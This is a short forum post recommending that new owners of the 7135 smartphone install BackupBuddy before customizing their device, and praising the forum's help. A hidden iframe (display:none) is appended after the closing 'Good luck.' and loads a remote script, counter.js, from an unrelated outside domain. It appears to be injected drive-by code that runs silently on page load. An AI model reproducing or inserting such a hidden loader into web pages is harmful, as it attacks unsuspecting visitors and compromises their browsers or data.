As my login information shows, I'm a "Junior Member"... and I know I don't know much, but I'd like to offer the following for those (like me) who are probably a bit less technically adept than others on the boards, but no less interested in the 7135...

Speaking from an experience I describe in a post about data loss elsewhere, I'd like to suggest that before you start investing any significant amount of time in customizing your new 7135, that you get at least the free version of BackupBuddy installed ASAP (www.backupbuddy.com). I was EXTREMELY fortunate to have done so the other evening and it just saved LOTS of hours of my time that I've put into setting up the 7135 over the last few days.

And no, I don't work for Blue Nomad (the developers of Backup Buddy), but I am going to buy the full version of their great software.

And as for this forum -- www.smartphonesource.com -- it's a great website... I don't know who runs it or who to thank... but the advice and tips (and patience) on here have been phenomenal!

Good luck.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>